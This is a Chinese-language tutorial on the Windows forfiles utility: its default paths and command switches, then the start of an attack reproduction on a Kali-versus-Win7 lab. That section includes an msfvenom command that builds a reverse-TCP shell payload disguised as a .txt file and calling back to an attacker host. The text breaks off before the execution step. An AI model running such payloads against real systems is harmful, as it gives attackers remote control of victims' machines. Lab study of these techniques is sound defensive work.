0x01 Forfiles简介:
Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。
说明:Forfiles.exe所在路径已被系统添加PATH环境变量中,因此,Forfiles命令可识别,需注意x86,x64位的Forfiles调用。
Windows 2003 默认位置:
C:\WINDOWS\system32\forfiles.exe
C:\WINDOWS\SysWOW64\forfiles.exe
Windows 7 默认位置:
C:\WINDOWS\system32\forfiles.exe
C:\WINDOWS\SysWOW64\forfiles.exe
0x02 forfils使用
/ P 路径 用于搜索文件的目录(文件夹)。默认为当前目录。 不接受UNC路径(\\ machine \ share)。 / M 搜索掩码 一个glob模式(通配符搜索)。仅选择文件名与模式匹配的文件。文件扩展名包含在文件名中; 不是路径(文件夹名称)。模式必须与整个名称匹配,或使用通配符。默认设置是匹配所有文件。 此选项把glob模式*.*和*不同。前者仅匹配名称中带有点的文件,而后者甚至匹配没有点或扩展名的文件。即使给定*.*模式,大多数DOS / Windows命令也会匹配没有扩展名的文件。 / S (没有) 选择子目录中的匹配文件。默认情况下,仅搜索单个指定目录。 /C 命令 为每个匹配的文件执行给定的命令。命令字符串通常需要用双引号括起来。请参阅下面的命令字符串中的语法。默认命令是CMD /C ECHO @FILE,导致输出(显示)每个匹配文件的名称。 / d 日期 根据上次修改日期选择文件。请参阅下面的日期语法。默认情况下,无论日期如何,都会选择文件。 /? (没有) 显示帮助消息(简要使用说明)。禁止文件搜索/命令执行。不得与任何其他开关一起使用。
0x03 复现
攻击机: Kali
靶机: win7
Msf配置:
生成木马:
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f msi > hacker.txt
靶机执行:
